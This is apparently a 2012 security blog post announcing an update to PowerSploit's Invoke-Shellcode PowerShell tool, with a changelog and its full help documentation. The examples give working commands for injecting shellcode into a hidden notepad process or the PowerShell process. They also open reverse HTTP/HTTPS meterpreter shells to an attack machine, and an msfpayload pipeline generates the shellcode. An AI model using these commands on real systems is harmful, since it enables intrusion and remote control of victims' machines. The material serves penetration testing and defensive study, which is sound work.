Exploit Monday: 8/19/12

PowerSploit Repo

I just released an updated version of Invoke-Shellcode. Significant portions of the code have been cleaned up and its parameters were simplified. While I hate to change the original interface, there were several redundancies in the original parameters that didn't make any sense. Here is the changelog for this release:

New Features/Changes:

Dramatically simplified parameters. Removed redundancies and named parameter sets more appropriately

Added 'Shellcode' parameter. Now, you can optionally specify shellcode as a byte array rather than having to copy and paste shellcode into the $Shellcode32 and/or $Shellcode64 variables

Added 'Payload' parameter. Naming is now consistant with Metasploit payloads. Currently, only 'windows/meterpreter/reverse_http' and 'windows/meterpreter/reverse_https' payloads are supported.

Invoke-Shellcode will now prompt the user to continue the 'dangerous' action unless the -Force switch is provided. Hopefully, this will prevent some people from carrying out stupid/regrettable actions.

Added the 'ListMetasploitPayloads' switch to display the Metasploit payloads supported by Invoke-Shellcode

Bug fixes/Miscellaneous:

Added UserAgent parameter to help documentation
Code is much more readable now
Changed internal helper functions to 'local' scope
Now using proper error handling versus Write-Warning statements
Added a subtle warning to the built-in shellcode...

Here is the updated help documentation:

NAME
Inject-Shellcode
SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Module - Inject-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
SYNTAX
Inject-Shellcode [-ProcessID <uint16>] [-Shellcode <Byte[]>] [-Force]
Inject-Shellcode [-ProcessID <uint16>] [-Payload <string>] -Lhost <string> -Lport <int32> [-UserAgent <string>] [-Force]
Inject-Shellcode [-ProcessID <uint16>] [-ListMetasploitPayloads] [-Force]
DESCRIPTION
Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.

PARAMETERS
-ProcessID <uint16>
Process ID of the process you want to inject shellcode into.
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-Shellcode <Byte[]>
Specifies an optional shellcode passed in as a byte array
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-Payload <string>
Specifies the metasploit payload to use. Currently, only 'windows/meterpreter/reverse_http' and 'windows/meterpreter/reverse_https' payloads are supported.
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-ListMetasploitPayloads [<switchparameter>]
Lists all of the available Metasploit payloads that Inject-Shellcode supports
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-Lhost <string>
Specifies the IP address of the attack machine waiting to receive the reverse shell
Required? true
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-Lport <int32>
Specifies the port of the attack machine waiting to receive the reverse shell
Required? true
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-UserAgent <string>
Optionally specifies the user agent to use when using meterpreter http or https payloads
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-Force [<switchparameter>]
Injects shellcode without prompting for confirmation. By default, Inject-Shellcode prompts for confirmation before performing any malicious act.
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?

NOTES
Use the '-Verbose' option to print detailed information.
Place your generated shellcode in $Shellcode32 and $Shellcode64 variables or pass it in as a byte array via the '-Shellcode' parameter
Big thanks to Oisin (x0n) Grehan (@oising) for answering all my obscure questions at the drop of a hat - http://www.nivot.org/
-------------------------- EXAMPLE 1 --------------------------
C:\PS> Inject-Shellcode -ProcessId 4274
Description
-----------
Inject shellcode into process ID 4274.
-------------------------- EXAMPLE 2 --------------------------
C:\PS> Inject-Shellcode
Description
-----------
Inject shellcode into the running instance of PowerShell.

-------------------------- EXAMPLE 3 --------------------------
C:\PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden
C:\PS> $Proc = Get-Process notepad
C:\PS> Inject-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbose
VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM
VERBOSE: Injecting shellcode into PID: 4004
VERBOSE: Injecting into a Wow64 process.
VERBOSE: Using 32-bit shellcode.
VERBOSE: Shellcode memory reserved at 0x03BE0000
VERBOSE: Emitting 32-bit assembly call stub.
VERBOSE: Thread call stub memory reserved at 0x001B0000
VERBOSE: Shellcode injection complete!
Description
-----------
Establishes a reverse https meterpreter payload from within the hidden notepad process. A multi-handler was set up
with the following options:
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.30.129 yes The local listener hostname
LPORT 443 yes The local listener port

-------------------------- EXAMPLE 4 --------------------------
C:\PS> Inject-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80
Description
-----------
Establishes a reverse http meterpreter payload from within the running PwerShell process. A multi-handler was set up
with the following options:
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.30.129 yes The local listener hostname
LPORT 80 yes The local listener port

-------------------------- EXAMPLE 5 --------------------------
C:\PS> Inject-Shellcode -Shellcode @(0x90,0x90,0xC3)
Description
-----------
Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit!
-------------------------- EXAMPLE 6 --------------------------
C:\PS> Inject-Shellcode -ListMetasploitPayloads
Payloads
--------
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https

Enjoy and let me know if you have any suggestions for improvements!

Exploit Monday

Monday, August 20, 2012

PowerSploit - Invoke-Shellcode Update